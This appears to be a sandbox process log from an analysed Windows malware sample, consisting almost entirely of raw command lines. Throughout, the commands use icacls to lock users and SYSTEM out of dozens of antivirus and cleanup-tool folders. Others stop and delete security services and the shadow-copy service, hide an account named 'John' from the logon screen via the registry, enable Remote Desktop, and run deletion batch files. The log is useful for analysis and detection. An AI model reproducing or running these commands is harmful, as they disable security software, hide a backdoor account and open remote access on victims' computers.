C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
C:\Windows\system32\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\system32\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\system32\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls C:\FRST /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)
C:\Windows\SysWOW64\unsecapp.exe
"C:\Windows\SysWOW64\unsecapp.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F
C:\Windows\system32\icacls.exe
icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F
C:\Windows\system32\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F
C:\Windows\system32\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\system32\sc.exe
sc delete swprv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\system32\sc.exe
sc stop mbamservice
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\system32\sc.exe
sc stop bytefenceservice
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\system32\sc.exe
sc delete bytefenceservice
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\system32\sc.exe
sc delete mbamservice
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\system32\sc.exe
sc delete crmsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat
C:\Windows\system32\timeout.exe
timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4972,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
